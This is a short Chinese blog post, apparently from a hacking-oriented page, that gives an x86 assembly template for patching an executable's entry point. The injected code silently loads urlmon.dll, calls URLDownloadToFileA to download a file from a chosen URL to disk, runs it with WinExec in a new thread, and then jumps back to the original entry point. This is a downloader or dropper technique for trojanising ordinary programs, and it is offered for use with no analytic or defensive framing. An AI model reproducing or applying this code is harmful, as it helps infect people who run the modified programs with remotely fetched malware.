通过修改程序的代码使程序能够下载并运行指定程序

相关代码如下:
  原入口:
  jmp  xxxxxxxx    代码段②开始的位置
  ①:
  pushad
  push xxxxxxxx    字符串urlmon.dll的位置
  call kernel32.LoadLibraryA
  push xxxxxxxx    字符串URLDownloadToFileA的位置
  push eax
  call kernel32.GetProcAddress
  push 0
  push 0
  push xxxxxxxx    存放位置,如:c://1.exe
  push xxxxxxxx    下载位置
  push 0
  call eax
  push 0
  push xxxxxxxx    存放位置
  call kernel32.WinExec
  popad
  retn


  ②:
  pushad
  push 0
  push 0
  push xxxxxxxx    代码①开始的位置
  call msvcrt._beginthread
  jmp xxxxxxxx     原入口的位置
 
阅读更多
文章标签: c
上一篇目前比较常用的挂马代码
下一篇Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
想对作者说点什么? 我来说一句

python写的开机自动执行程序

2009年10月13日 1.43MB 下载

限制某个程序在规定时间内运行

2008年12月24日 224KB 下载

C# 使程序能够运行一个

2009年04月23日 9KB 下载

通过网页自动运行EXE程序

2008年12月26日 607B 下载

没有更多推荐了,返回首页

关闭
关闭